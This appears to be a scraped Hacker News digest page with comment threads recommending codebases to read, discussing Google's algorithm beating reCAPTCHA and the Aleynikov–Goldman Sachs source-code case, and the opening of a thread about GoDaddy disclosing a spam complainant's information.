agumonkey 20 hours ago 0 replies      
I really enjoyed skimming through Ian Piumarta's Maru, a Lisp in C, very pretty code, very concise. (I already mentioned it in other topics)

http://piumarta.com/software/maru/

28
paulrademacher 9 hours ago 1 reply      
Any suggestions for smaller codebases? A lot of these are great and you'll pick up idioms here and there, but they're massive.
29
betterunix 15 hours ago 0 replies      
SBCL or CMUCL -- Lisp compilers written in Lisp.
30
kjs3 14 hours ago 0 replies      
I learned a huge amount about how real operating systems are put together and the compromises that get made by reading the V6 Unix source via John Lions Commentaries (yes...I had a photocopied copy). Made exploring the BSD 4.2 and 4.3 source trees (another worthwhile exercise) much easier. I suppose if I was starting out today and not in 1985 I'd look at xv6 or Minix.
31
twelvechairs 19 hours ago 0 replies      
The most interesting things to read are those where a programmer has done something cleverly, but this only needs to happen when your language or libraries make it hard for you to begin with. Aside from low-level performance intensive functions, the best code is not interesting to read - it just reads like statements of fact.
32
hiisi 18 hours ago 0 replies      
C -> Redis

I haven't written any C for years, but really enjoyed skimming through Redis codebase, it's so clean, easily understandable and extensible.

33
villek 17 hours ago 2 replies      
I found the annotated source code of the underscore.js to be very educational: http://underscorejs.org/docs/underscore.html
34
tlrobinson 11 hours ago 2 replies      
Lots of great suggestions here, but I'm interested in how you go about reading source code, especially very large codebases?
35
patrickg 15 hours ago 0 replies      
I suggest the source code of TeX. Not new, but still very interesting to read.

source that needs some postprocessing (tangle/weave):

http://mirrors.ctan.org/systems/knuth/dist/tex/tex.web

PDF from the source (including hyperlinks)

https://www.tug.org/texlive/devsrc/Master/texmf-dist/doc/gen...

36
riffraff 16 hours ago 0 replies      
Not a specific codebase, but I went through "Code Reading"[0] many years ago, I found it interesting. Most reviews are not very positive though, so maybe it was just at the right point for me.

[0] http://www.amazon.com/Code-Reading-Open-Source-Perspective/d...

37
DalekBaldwin 16 hours ago 1 reply      
Honestly, aside from learning to express a few extremely specific patterns in your language of choice concisely and elegantly and reminding yourself of the existence of certain libraries and utility functions so you don't accidentally waste time reinventing them, I think reading source code is a pretty useless exercise unless you also have a detailed record of how that source code came to exist in its present form. Until there is some revolutionary new tool for generating a human-understandable narrated history of large-scale design decisions from a source control history, your time will almost certainly be better spent reading textbooks that incrementally develop a piece of software over several chapters. Even that is cheating -- the authors know exactly where they want to end up and they won't include all the missteps they made when they first started writing similar programs. But it's still loads better than the alternative. Just as sitting in a law school library absorbing an encyclopedic knowledge of the law won't really train you to make arguments that will fly in front of a judge, reading a code base as a dead, unchanging document won't teach you what it is to live in that code.
38
nicholassmith 19 hours ago 0 replies      
I had a read through the PCSX2 emulator recently, that was quite interesting: https://github.com/PCSX2/pcsx2 it's a complex project in what was surprisingly readable C++ code.
39
nextos 9 hours ago 0 replies      
I think 2 suggestions by plinkplonk in the original thread would be still relevant:

Common Lisp - "Paradigms of Artificial Intelligence Programming" by Peter Norvig and "On Lisp" by Paul Graham

C - "C Interfaces and Implementations"

Minix 1 and XMonad are also very good suggestions too.

40
davedx 18 hours ago 1 reply      
* BackboneJS

* UnderscoreJS

41
rasur 11 hours ago 0 replies      
Anything by Fabrice Bellard (Google him, it's worth it).
42
jacquesm 20 hours ago 5 replies      

  C -> Varnish  PHP -> Yii   Ruby -> Merb  Scheme -> Arc  Clojure -> Core  JavaScript -> Multeor
Any languages in particular that you're interested in not covered above?

43
chris_wot 14 hours ago 0 replies      
It's not great code (though I'm working to make it so), and perhaps not the intent of this question - but if you want to looking at a 25+ year old codebase that's being refactored, check out LibreOffice, especially the VCL component:

http://cgit.freedesktop.org/libreoffice/core/log/vcl/

44
redox_ 17 hours ago 0 replies      
For all low-level I/O details (fflush/fsync/fsyncdata on files/directories after creation/renaming), I've used to read MySQL routines, pretty simple to understand: https://github.com/twitter/mysql/tree/31d6582606ddf4db17ad77...
45
entelect 18 hours ago 0 replies      
46
collyw 18 hours ago 1 reply      
Slight tangent to your question, but one thing I have noticed recently is that having to deal with really crap code inspires me to do my own better.

I inherited a colleagues work after she left, and it was horrible. But I thought about why it was horrible, and how to make it better. What would it look like if it was done well?

Even with my own code, if I look at something I did 6 months ago, and it doesn't make sense straight away, the it can usually be improved.

47
pincubator 10 hours ago 1 reply      
Also can someone suggest what is the best way to approach code reading? When I open a library in Python, I am not sure where to start reading, just a bunch of files. Should I randomly pick one file and start reading from there? Is there any common strategy?
48
j_s 14 hours ago 0 replies      
In the .NET world, shanselman has a series of Weekly Source Code blog posts and most recently posted a list of seven 'interesting books about source and source code'.

http://www.hanselman.com/blog/CategoryView.aspx?category=Sou...

49
laichzeit0 19 hours ago 0 replies      
Eric S. Raymond wrote a book The Art of Unix Programming [1] that has many "case studies" as well as recommendations of which software/RFCs are particularly worthy of study.

[1] http://www.faqs.org/docs/artu/

50
lightyrs 10 hours ago 0 replies      
I find anything by https://github.com/jashkenas to be transparent and enlightening.
51
qwerta 10 hours ago 0 replies      
For Java I highly recommend H2 SQL DB. It has everything (parsers, sockets, webui...) in very tight and nice package.
52
twunde 14 hours ago 1 reply      
For PHP, I've been very impressed by Phabricator's code (and the related phutils library). It's worth looking at the git commits as well to see just how clean and structured commits can be.I'm much more impressed by it than by any PHP framework code I've read (and I've read Zend, Symfony2, li3, codeigniter as well as custom frameworks
53
snarfy 11 hours ago 0 replies      
If you are interested in rendering engines I suggest Irrlicht. It's fairly clean and easy to understand.
54
diegoloop 19 hours ago 0 replies      
I made this tool: http://codingstyleguide.com to improve the way I code for different languages and not get lost with too much programming information and it's helping me a lot.
55
raju 15 hours ago 1 reply      
Any suggestions for Clojure projects?

[Update: Oops. I missed the "Clojure -> Core" by jacquesm]

56
vishnugupta 20 hours ago 0 replies      
I'm fascinated by concurrent programming. I find that reading classes from Java's java.util.concurrent package gives me very good practical insights as to what goes into building a concurrent class. My all time favorite is ConcurrentHashMap :)
57
borntyping 18 hours ago 0 replies      
Python: Flask (and related projects)
58
Hydraulix989 20 hours ago 1 reply      
C -> nginxC++ -> Chrome
59
dfkf 18 hours ago 0 replies      
OpenSSL
60
eadler 3 hours ago 0 replies      
FreeBSD kernel & userland
61
dschiptsov 17 hours ago 1 reply      
nginx/src/os/unix/
62
db48x 18 hours ago 0 replies      
TeX the Book is good, even if it is in Pascal.
63
s_dev 19 hours ago 0 replies      
I've heard that reading the Git source code is very beneficial but haven't done it myself yet.
64
ddz 10 hours ago 0 replies      
Find yourself a copy of this. Not only did it play a crucial role in the history of the UNIX/Linux world, it is a gold mine for understanding operating systems.http://en.wikipedia.org/wiki/Lions%27_Commentary_on_UNIX_6th...
65
willvarfar 19 hours ago 1 reply      
(You say the 'naive' way; how can it be compressed better?)
66
RhysU 6 hours ago 0 replies      
FFTW.
67
visualR 19 hours ago 0 replies      
Xournal
68
marincounty 14 hours ago 0 replies      
Get to know the command line before you start any language.
69
plicense 18 hours ago 0 replies      
Everything at Google.
23
Google's Street View computer vision can beat reCAPTCHA with 99% accuracy googleonlinesecurity.blogspot.com
315 points by apawloski  1 day ago   145 comments top 45
1
zwegner 1 day ago 13 replies      
This particular issue (AI performance on captchas) is really quite fascinating. It's an arms race, but the problem is, only one side can win. Google is claiming they have improved their system in some (understandably) unspecified way, but there's only so far this can go. Captchas need to detect whether someone is human, but it has to work for everyone, ideally, even those with disabilities. Any simple task a human can do will eventually be able to be automated. Tasks that aren't currently feasible to be automated, say some natural language processing tasks, have another problem: scalability. To prevent simple databases of problems -> solutions, the problems need to be generated en masse, and for cheap, which means a computer needs to generate the solutions in the first place. And of course, paying people to just do captchas all day already happens.

The street address/book scan approach that Google uses is interesting in that the exact solution is not known, so they presumably have to be somewhat forgiving in accepting answers (as their machine learning might have gotten it wrong). Perhaps this is what their "risk analysis" refers to--whether their response seems "human" enough according to their data, not necessarily whether it's correct.

I don't see a way around this problem for free services that still preserves privacy (so directly using some government-issued ID is off the table). Maybe some Persona-like digital signature system, where a person can go to a physical location with a government ID, and get a signature that says "Trusted authority X affirms that person Y is in fact a person". Obviously this still has problems, as you need to trust X, and it's a big pain in the ass.

There are parallels to the realm of passwords, which are also becoming obsolete (not that there's a good replacement...). Anything that a human can feasibly remember for a bunch of sites is becoming easier and easier for computers to guess.

So basically, computers are taking over the world, and we can't do anything to stop it. God help us all.

2
josho 1 day ago 2 replies      
Interestingly I activated a new gmail account today and during the signup process I experienced the obligatory captcha. It was in two parts, the first looked strikingly like a street view picture of a house number, while the second looked like a traditional captcha.

I suspect that google has been using techniques like this to validate their computer vision conclusions. Which makes their 99% assertion even more interesting, because it's likely 99% confirmed by a very large crowd sourced data set, not simply a staff member going through several hundred samples to come up with the success rate.

3
jrochkind1 1 day ago 2 replies      
From that caption "CAPTCHA images correctly solved by the algorithm", there are at least two of them that I'm not sure _I_ can correctly solve on the first try.

Which is generally my experience with captcha's these days, I only have about a 50% success rate.

CAPTCHA is a failed strategy, time to give it up.

4
adyus 1 day ago 4 replies      
In effect, Google computer vision got so good that they made their own system obsolete. This is a good thing.

I still think the only reliable way to confirm identity (or humanity) online is an email or SMS verification. Recently, receiving a 2-factor SMS code took less time than the page refresh prompting me to enter it.

5
zobzu 1 day ago 1 reply      
The program solves captcha that I, as a human, cannot solve.Pretty sure that means captcha of that type are definitely dead.
6
frik 23 hours ago 0 replies      
Google's reCAPTCHA showed street numbers as one of the two catcha-"words" for more than two years.

For me this was quiet annoying to input street numbers of others. It's a privacy issue, it was like helping the NSA spying and one feels bad entering Google's captcha.

What is even more astouning is that Google does not even mention all the croud sourced "volunteers" that trained their OCR database. As Google use an open OCR software (former HP OCR app from '95) it would be a good choice to publish their data back to the community.

I removed Google captcha on my own sites and implemented my own traditional captcha (on the first sight of it about two years ago).

7
jere 1 day ago 3 replies      
>In this paper, we show that this system is able to accurately detect and read difficult numbers in Street View with 90% accuracy.

> Turns out that this new algorithm can also be used to read CAPTCHA puzzleswe found that it can decipher the hardest distorted text puzzles from reCAPTCHA with over 99% accuracy.

Am I missing something or could we improve CAPTCHAs by mimicking street numbers?

8
dnlbyl 1 day ago 3 replies      
99% is probably better than my success rate with reCAPTCHA...
9
pacofvf 1 day ago 0 replies      
well there are a lot of Resolve CAPTCHA as a Service sites like http://www.9kw.eu/
10
ilitirit 1 day ago 0 replies      
To be honest, I can't even solve those reCAPTCHAs on that page (that's one of my biggest gripes about reCAPTCHA). I think we're nearing a point in time where if some(thing) can solve a particularly hard CAPTCHA, we can safely assume that it's not human.
11
msvan 18 hours ago 1 reply      
Here's a captcha idea: make people write a 100-word essay on a specific topic. If it's good, you're accepted and you won't have to do it again. If it's bad, you're either a computer or cheap Nigerian labor. When we get to the point where we can't distinguish a computer from a human, we'll just let them be a part of the community.
12
dlsym 1 day ago 0 replies      
"CAPTCHA images correctly solved by the algorithm" - Ok. Now I have to consider the possibility of being a machine.
13
pestaa 10 hours ago 0 replies      
Folks, I figured it out! Let's use captcha so that visitors can prove they are robots! If you fail these captchas, you must certainly be a human!
14
rasz_pl 19 hours ago 0 replies      
Does google aggregate&correlate data in vision algo?

For example for street numbers they not only have picture of a number, they also have knowledge of all the other numbers on that street and guesses for those other numbers. Easy to guesstimate order of a number by checking neighbouring ones.

Same for book words, they have n-gram database.http://storage.googleapis.com/books/ngrams/books/datasetsv2....

Thats a lot of useful MAP/ML data.

But the example they give for the new captchas all look like random crap, "mhhfereeeem" and the like. Its like they are not interested in structure, just pure geometry of letters/numbers.

15
shultays 15 hours ago 0 replies      
My accuracy is way below 99%, good job Google!

Seriously though, I hope this does not mean there will be harder captchas, current ones are already stupidly hard

16
zatkin 1 day ago 1 reply      
But can it beat CRAPCHA? http://crapcha.com/
17
infinity0 19 hours ago 0 replies      
Ironic how the HTTPS version force-redirects you to HTTP. (Amazon.co.uk started doing this a few days before and it's pissing me off no end.)
18
spullara 21 hours ago 0 replies      
Reminds me of a hack day at Yahoo where one team made a captcha where you had to match a photo with its tags and another team made an algorithm that would assign tags to a photo. Both based on Flickr humans meant that the captcha was easily solvable by the algorithm.
19
spullara 21 hours ago 0 replies      
So, now if you get the captcha right you're a computer, otherwise you are a human?
20
aviraldg 23 hours ago 0 replies      
Isn't this expected (and a natural consequence of the fact that it's trained on huge volumes of reCAPTCHA data?)
21
aaronbrethorst 1 day ago 0 replies      
I'm impressed that their address identification algorithm can solve those CAPTCHAs. I can't make heads or tails of them.
22
mrsaint 1 day ago 2 replies      
Captchas were meant to keep spammers at bay. Unfortunately, that's no longer the case. Thanks to "cloud technology" like DeathByCaptcha - that is, people in countries where labor is cheap solving captchas all day - spammers have no problem getting through reCaptcha-protected sites and forums to do their mischief.

As a result, reCaptcha & co tend to be more of an annoyance to honest visitors than to spammers.

23
rasz_pl 19 hours ago 0 replies      
>CAPTCHA images correctly solved by the algorithm

well, isnt that great? Because I, HUMAN, can maybe solve _one_ of those (lower right one).

I frickin HATE google Captchas and simply close the page if it wants me to solve one, they are too hard for me.

24
drawkbox 1 day ago 0 replies      
99% is better than most humans captcha accuracy. Back in my day humans could still beat computers at Chess but nowadays computers can beat humans at Jeopardy and drive. Interesting to see when it fully crosses over.
25
plg 1 day ago 1 reply      
Why isn't google releasing the full algorithm?
26
tsenkov 16 hours ago 0 replies      
It's fascinating how, arguably simple software now, which is the captcha, would inevitably become more and more complex as AI develops.
27
daffodil2 1 day ago 1 reply      
Wait, it's not clear to me from the blog post. Did they make a system that obsoletes reCAPTCHA? If so, it's just a matter of time before the spam systems catch up, correct? If so, what's the successor to CAPTCHA? Or is the web just going to be full of spam in the future?
28
aljungberg 19 hours ago 0 replies      
Google software could use their 99% successful algorithm to filter potential captchas. Then show the 1% they can't crack to humans.

Now the race becomes who can write the better captcha solver, Google or the spammers? As spammers learn to identify things in the 1%, Google will hopefully improve faster and continue to narrow the "hard to solve" band.

29
varunrau 1 day ago 0 replies      
I've always felt that it would be only a matter of time before computer vision would be able to solve the (re)CAPTCHA problem. Especially since digit classifiers are able to match the performance of humans.

One approach that I enjoyed seeing was the use of reverse captchas. Here you pose a problem that a computer can easily solve, but a human cannot. For instance, if you ask a simple question (1+1=?), but you place the question box off the screen so the user can't see it. A computer would be able to easily answer the question, but a human user would have no way of doing so.

30
pavelrub 1 day ago 0 replies      
This is essentially the technology that was discussed here 3 months ago [1], and it links to the exact same article on arxiv, titled: "Multi-digit Number Recognition from Street View Imagery using Deep Convolutional Neural Networks". [2]

They new addition to the article is that now they have tested the same type of NN on reCAPTCHA, and (perhaps unsurprisingly) it works.

[1] - https://news.ycombinator.com/item?id=7015602[2] - http://arxiv.org/abs/1312.6082v4.

31
northisup 1 day ago 0 replies      
Yet it says I'm a robot a good two of three times.
32
leccine 1 day ago 0 replies      
33
stuaxo 1 day ago 0 replies      
I'm sorry, as a human I have had to fill these street view style captchas in all the time for google, so this is hardly a completely artificial intelligence, humans have done it many many times, in fact I'm sure some of the pictures in the articles have come up.
34
blueskin_ 20 hours ago 0 replies      
Great... now they are going to get even harder to actually do.
35
exadeci 20 hours ago 0 replies      
You're welcome google (we are the rats labs that teached their system how to read)
36
peterbotond 1 day ago 0 replies      
what if someone has bad eyes of some rare eye problem and can not solve captcha problems at all? in other words fails captcha 90% of times.
37
vfclists 17 hours ago 0 replies      
Google are getting too creepy for any sensible persons liking. Addresses which are off the street in apartment complexes are now getting recognized as well.

Whenever I see these kind of captchas I switch to audio captchas. It is rather unethical for Google to use recaptchas in this way.

38
EGreg 1 day ago 0 replies      
Basically consider why we want to eliminate computers from accessing the sites -- because we want to make account creation expensive, to prevent sybil attacks and giving away scarce resources.

What is expensive? Reputation. That's where credit money's value comes from.

I wrote a more comprehensive piece here, in case anyone's interested: https://news.ycombinator.com/item?id=7601690

39
Keyframe 1 day ago 2 replies      
Now that programs are better and better at solving CAPTCHA - that means that correct CAPTCHA input will mean the opposite from what it means now. Since programs are better at solving CAPTCAH than humans, correct input (3/3 for example) will mean it's a robot. Thus, CAPTCHA becomes relevant again.
40
knodi 1 day ago 1 reply      
I just came here to say fuck reCAPTCHA! I hate it, I can't read it with my human eyes.
41
sajithdilshan 1 day ago 0 replies      
Skynet
42
spcoll 22 hours ago 0 replies      
It's a new success for Deep Learning. It seems to be actually 99.8% accuracy according to their paper: http://arxiv.org/abs/1312.6082

That's one order of magnitude higher.

43
conectorx 1 day ago 0 replies      
this is also can be done with tesseract or encog framework... i dont know whats news about this
44
maccard 1 day ago 0 replies      
Damn, that's better than me!
45
techaddict009 1 day ago 0 replies      
This is really Great. AI is getting really smarter and smarter day by day!
24
Cheap microscopes: Yours to cut out and keep economist.com
313 points by feelthepain  2 days ago   56 comments top 13
1
dm2 2 days ago 3 replies      
How do I purchase one?

Is it possible to attach to a phone to take a picture?

Here is their website: http://www.foldscope.com/

Why would the initial test to 10,000 if it only costs $1. I would gladly pay $5 (if that includes shipping). If there is a version 2, I would gladly pay $5 to purchase that one also.

This reminds me of the Cartmanland commercial, "awesome new themepark, and you can't come!"

2
chrisBob 2 days ago 2 replies      
I think it is a great product, but the numbers are a little misleading. In microscopy the most important number is usually the resolution not the magnification, and 1m is what you expect from a 20x objective. The 2100x specification doesn't help much and confuses people, but to be fair, a good 20x objective starts in the $200-400 range.
3
dm2 2 days ago 1 reply      
I found this DIY microscope for smartphones if anyone is interested: http://www.instructables.com/id/10-Smartphone-to-digital-mic...
4
cheetahtech 2 days ago 1 reply      
Here is the Ted Talk on the Microscope.

Its quite incredible.

http://www.ted.com/talks/manu_prakash_a_50_cent_microscope_t...

5
nathancahill 1 day ago 0 replies      
This is based on a ball lens. There are several ball lens hacks floating around the internet, like this "iPhone Microscope" research paper[0] and this DIY[1] to build your own. Ball lenses are cheap and you can attach it to cellphone camera lens with a little M3 tape.

The cutout paper part seems to just hold the slide, and pane it in front of the lens.

[0] http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjourna...

[1] http://www.instructables.com/id/Cheap-and-easy-iPhone-micros...

6
zafka 2 days ago 3 replies      
I did a quick search on the glass spheres, and the only place I could find to buy them was Edmund Optics for $15.00 each. Does anyone have a decent source for the lenses?
7
netcraft 2 days ago 1 reply      
Did anyone get in the initial test that can comment on the quality and performance?
8
davexunit 2 days ago 1 reply      
Please tell me that the specifications will be released under a free culture license.
9
gradi3nt 2 days ago 1 reply      
Can anyone comment on the more technical optical properties of this instrument? How does it perform compared to a traditional microscope with the same magnification and resolution?
10
RankingMember 2 days ago 0 replies      
Wow, this is awesome. I've been looking for a cheap microscope to just have around the house and noticed that they indeed haven't changed a lot in cost/features in quite some time.
11
VLM 2 days ago 1 reply      
Note that this is a different meme than the popular "you can make your own working general purpose camera out of cardboard". That meme is moderately popular and has been successfully implemented many times.

This is a different concept, of a precision manufactured, very cheap, single use, very specific medical test microscope generally revolving around a projection display technology.

I'm not saying its not cool. It is cool and is a net gain to humanity etc. Its just probably not what you're thinking it is based on the short description.

I think a general purpose "print/fold at home" microscope for educational purposes would be interesting, along the lines of numerous successful cardboard photographic cameras, and maybe even useful. The linked article, although also cool, has nothing to do with that meme, and is almost the precise opposite other than common construction material.

Also this is an old story, even if newly reported. I remember watching the TED talk from the TED RSS feed during a blizzard some months ago. As per Colin's post this is the 12th time its been featured on HN.

12
neals 2 days ago 1 reply      
Are there any images of what a 2100x magnification looks like?
25
Excerpt from Flash Boys about Serge Aleynikov and Goldman Sachs cryptome.org
311 points by peterbotond  5 days ago   200 comments top 35
1
ntakasaki 5 days ago 4 replies      
Continuing the story from his Wiki page:

In March 2011, Aleynikov appealed the conviction, asking the Second Circuit to review the District Court's decision denying his original motion to dismiss the indictment for failure to state a claim.[9]

On February 16, 2012, the United States Court of Appeals for the Second Circuit heard oral argument on his appeal and, later that same day, unanimously ordered his conviction reversed and a judgment of acquittal entered, with opinion to follow.[10] Aleynikov was released from custody the next day.

On April 11, 2012, Dennis Jacobs, Chief Judge of the United States Court of Appeals, published a unanimous decision in a written opinion[10] stating:

On appeal, Aleynikov argues, inter alia, that his conduct did not constitute an offense under either statute. He argues that: [1] the source code was not a "stolen" "good" within the meaning of the NSPA, and [2] the source code was not related to or included in a product that is produced for or placed in interstate or foreign commerce within the meaning of the EEA. We agree, and reverse the judgment of the district court.[9]

In the course of these events, Aleynikov has spent 11 months in prison. Aleynikov has divorced, lost his savings, and his career is ruined.[11]

The government did not seek reconsideration of the Second Circuit's ruling, thus ending federal action against Aleynikov.[12]

2
rdtsc 5 days ago 1 reply      
For those that don't know, Serge is a great Erlang and C++ programmer and he contributes to open source (had some pull requests to Erlang itself).

Here is his Github account:

https://github.com/saleyn

You can find his posts on Erlang's mailing list once a while.

Two of his interesting project I am following:

https://github.com/saleyn/erlexec -- a utility to control OS process from Erlang.

https://github.com/saleyn/eixx/ -- Erlang to C++ interface.

3
yukichan 5 days ago 2 replies      
This sucks, but seriously never talk to the police. Don't write anything down. Don't say anything. Don't sign anything. Tell them your name and otherwise just stay silent. They are never trying to help you, they're trying to close their case.
4
Mikeb85 5 days ago 3 replies      
Read the GPL carefully, very carefully...

An organisation counts the same as an individual, and as long as code stays within the organization that doesn't count as 'distribution', and Goldman Sachs is under no obligation to release the code. They even retain the rights to prevent the code being released.

It's easy to hate on Goldman Sachs for many things, but in this case they didn't violate the GPL, and Aleynikov did commit a crime.

5
zx2c4 5 days ago 2 replies      
> He deleted his bash history the commands he had typed into his own Goldman computer keyboard. To access the computer, he was required to type his password . If he didnt delete his bash history, his password would be there to see, for anyone who had access to the system.

Wait, what?

6
muyuu 5 days ago 2 replies      
Sounds to me like it was Aleynikov who didn't understand the severity of the crime he committed.

I work in a similar environment and I'm fully aware that if I do something remotely like bringing my code from work home, holy crap I'm committing a very VERY serious crime and my employer would go after me as viciously as they could. Very especially if I were to be going somewhere else where this code would set me up to make a new competing engine.

Pushing stuff to SVN and mailing seem innocuous... but depending on what you are actually passing around they can be extremely serious crimes.

7
mcv 5 days ago 0 replies      
Old story. Definitely sucks for him, but mailing yourself proprietary code of a very secretive and ruthless bank is not exactly the smartest thing to do.
8
infinotize 5 days ago 0 replies      
Amazing how naive in some regards a very smart person can be. You don't send yourself source code, and you definitely don't talk to police without a lawyer, or invite them into your house.
9
dfc 5 days ago 0 replies      
I don't understand this bit about the DNI:

  US master  spy Clapper says  spies steal open source,  then immediately  claims ownership and  classifies it, and prosecutes if  the material is  disclosed, like Goldman Sachs.
What did Clapper do?

10
artellectual 5 days ago 0 replies      
Seems to me here, the biggest lesson one can learn from this story is don't work for companies like Goldman Sachs. if they don't want to get with the times and understand how the world they don't understand works then they deserve to be technically behind. So on top of not understanding your work as a developer instead of learning how things work, they choose to abuse the law. Worse part is the law is like a big spider web where it traps the small guys while the tigers and elephants walk right through, there is no justice here no matter how many sections you quote or how many laws you read. Best thing is to just be smart and not get involved. There are many opportunities out there for talented developers.
11
crystaln 5 days ago 0 replies      
So, he emailed source code to himself (yes that was illegal and violated his employment contract,) deleted the bash history (there are plenty of other ways to prevent your password from showing up in history,) waived his right to a lawyer, talked endlessly with an FBI agent and was surprised (?!) that the agent was not a computer expert, then signed a confession.

Sorry if I fail to have much sympathy. If you play in the big leagues, you should at least have some sense of self preservation.

12
bayesianhorse 5 days ago 1 reply      
Moral of the story: If you don't want to be thrown in jail for stealing something you didn't steal, don't sign a confession...

In fact it sounds as if the defendant actually phrased most of the confession himself...

13
FD3SA 5 days ago 1 reply      
The programmer types were different from the trader types. The trader types were far more alive to the bigger picture, to their context. They knew their worth in the marketplace down to the last penny. They understood the connection between what they did and how much money was made , and they were good at exaggerating the importance of the link. Serge wasnt like that. He was a little-picture person, a narrow problem solver. I think he didnt know his own value, says the recruiter.

This infuriates me to no end. These engineers need to be rounded up, and given a serious life lesson on the reality of markets. Knowing your product/service's worth is step 1 of any free market activity.

Engineering is the only profession where the most talented engineers occupy the lowest compensation brackets with respect to their worth. All sorts of bullshit excuses are made up for this (my favorite - they're "Specialists"), but the bottom line is they are not being compensated at anywhere near what they're worth.

This is why startups, and consulting firms, are so key. If the market you're trying to enter is too big for a small operation (like Wall St.), then just consult. Those 20 superstar programmers need to meet up and start a consulting firm. Then, they sell their services to these banks and charge them whatever they want (read: a lot).

They then use this compensation to hire the best engineers from across the world, and keep them out of Wall St's hands. This wouldn't be too difficult, because Wall St would never match salaries because they are traders, and would die before they paid an engineer more than themselves.

To all of HN: please don't underestimate your worth. It hurts everyone, including yourself.

14
gflateman 5 days ago 0 replies      
flash boys also talks about the FBI's suspicion when they heard Aleynikov was using software called 'subversion', and assuming he was thus doing something 'subversive'

that cracked me up!

15
Natsu 5 days ago 0 replies      
> On the night of his arrest, Serge waived his right to call a lawyer. [...] Then he sat down and politely tried to clear up the confusion of this FBI agent who had arrested him without an arrest warrant.

These are things no sane person should do, especially if they're innocent.

16
doktrin 5 days ago 0 replies      
What repeatedly stands out every time I read of this account is the relative ineptitude of the federal agents handling the investigation.

There appears to be every indication that agent McSwain did everything short of taking explicit marching orders from GS.

The FBI either lacked the will or ability to understand the crimes they were tasked with investigating. I find that disturbing.

17
auggierose 5 days ago 4 replies      
There is a simple solution to this. When you publish open source software, make sure that in your license it says that Goldman Sachs is not allowed to use this code for any purpose whatsoever.
18
ececconi 5 days ago 0 replies      
The original link didn't mention this was an excerpt from Flash Boys so I had no clues Michael Lewis wrote it. I've never read any of his books. Now I want to because he actually writes pretty well.
19
fredgrott 5 days ago 0 replies      
the problem I have with the article is that FOSS/OSS used internally and modified for that use and not distributed would mean under normal copyright and work rules that yes GS did own the changes to OSS/FOSS used internally but never distributed.
20
ig1 5 days ago 4 replies      
Flagged because article completely misunderstands how GPL works. GPL doesn't apply if you modify source-code to use internally, it only applies if you distribute it externally to third party users.

[GPL not mentioned in article; my recollection from the original court documents is that the code was largely LGPL and GPL code]

21
ithought 5 days ago 0 replies      
His federal conviction was overturned then they later recharged him for the same incident in state court. Also Congressman Lamar Smith, who sponsored SOPA, amended the Economic Espionage Act of 1996 with the Theft of Trade Secrets Clarification Act of 2012 specifically related to this case.

Sergey's Legal Defense Fund - http://www.aleynikov.org/

22
hynahmwxsbyb 5 days ago 2 replies      
I wonder how much this cost Goldman from a talent perspective.
23
kylemaxwell 5 days ago 1 reply      
I thought the policy here was to use the actual title of the article, not to edit it. Why did the moderators change it?
24
yoamro 5 days ago 0 replies      
Trying to sympathize with the guy, but signing a confession?....just doesn't make sense
25
leccine 5 days ago 0 replies      
Lesson learned, don't ever work for Wall Street.
26
eriktrautman 5 days ago 0 replies      
I don't normally bring this up but in this case the site formatting is essentially unreadable for someone with poor eyesight who needs to expand the text and make the container narrow to avoid constant left/right scrolling.
27
kayoone 5 days ago 1 reply      
"Aleynikov was employed for two years, from May 2007 to June 2009, at Goldman at a salary of $400,000.[1] He left Goldman to join Teza Technologies, a competing trading firm which offered to triple his pay.[5]"

jeez, those banks pay a pretty penny.

28
james-bronze 5 days ago 0 replies      
(I'm sorry if I do this incorrectly; first time posting plus I'm on an app)

"Serge tried to explain why he always erased his bash history, but McSwain had no interest in his story. The way he did it seemed nefarious, the FBI agent would later testify."Whom is the FBI agent referring to, McSwain or Serge?

29
zenbowman 5 days ago 1 reply      
Goldman is a nest of parasites and vultures, do we really expect anything more from them?
30
PythonicAlpha 5 days ago 0 replies      
That is the problem with invention vs. "intellectual property". Inventions belong to the inventor -- property belongs to the owner.
31
caycep 5 days ago 1 reply      
probably OT...but Cryptome posting an excerpt from a Michael Lewis book? that's a bit out of character...
32
senthilnayagam 5 days ago 0 replies      
so effectively Goldman Sacks killed the potential competing high performance trading platform
33
notastartup 5 days ago 0 replies      
This is batshit insane. Wall Street is fucking insane. I hope Serge wins a huge lawsuit.
34
35
zorbo 5 days ago 4 replies      
Okay, so.

* misleading title. Goldman Sachs stole nothing.

* This guy steals code from Goldman Sachs.

* Covers his tracks. There is almost no reason why your password ever ends up in your bash history. If it does, you edit out only the password. Or you put a space before the command you run. At any rate, this guy should have known how to prevent his password from getting in the shell history and had no reason to delete his history.

* The guy talks to the cops

* Waves his rights to a lawyer

* Signs a confession

* Lets cops into his house without a search warrant.

* Doesn't testify at this trial.

This guy fully deserved what was coming to him. Goldman Sachs did nothing wrong here.

26
GoDaddy Released My Personal Information to a Spammer Troll skepchick.org
307 points by kmfrk  1 day ago   141 comments top 29
1
jxf 1 day ago 7 replies      
While GoDaddy has a point about the opt-in component being important for deciding whether spamming took place, they certainly didn't need to release her personal information to the spammer. That's a terrible, serious breach of privacy.

A naive approach that might work without either party needing to divulge emails:

GoDaddy: "We have received complaints that you've been spamming. Give us a list of SHA-1 hashes of addresses of the people that opted in and show us how they opted in."

Customer: "Here's the list."

GoDaddy: "At least one complaint email we received does not match the SHA-1s on this list."

2
filmgirlcw 1 day ago 0 replies      
I'm loathe to defend GoDaddy, but I don't know if they can be "blamed" in this case, if only because what happened here was not the typical spam scenario.

If I'm understanding the situation correctly (and if I'm not, please let me know), a crazy person with an agenda sent a mass-mailing to about hundreds atheists/bloggers in an attempt to push his POV. Skepchick reports him to his email host (in this case, GoDaddy), under their spam terms.

GoDaddy does their standard process, which includes asking for opt-in proof, and revealing the email. Crazy guy goes crazy and makes a website dedicated to trying to defame Skepchick, using info he found about her online.

The problem is, this wasn't typical spam. Meaning, this wasn't some bot sending out Viagra sales pitches or the "great investment leads" people that send me 30 messages a day. This was unsolicited mail, yes, but it was with an agenda. Basically, I'd classify it more as harassment.

I'd imagine the situation would have been handled differently if it was flagged/seen/filed as harassing messages, rather than spam. I don't know, but I have to assume GoDaddy has an abuse team and that their methods of handling this sort of thing would be different.

Please understand, I'm not putting the onus on Skepchick to correctly know how to classify the message. It stands to reason she thought this was spam. But at the same time, I don't know if this sort of edge case is common enough to require a more complex method such as SHA-1 hashes.

Shitty situation all the way around, but I think the biggest problem was this was treated as a normal case of spam, when really it was a case of abuse/crazy.

3
masklinn 1 day ago 2 replies      
So GoDaddy is utterly terrible both when you're their client and when you're not their client. Great. Could that company be burned to the ground already?
4
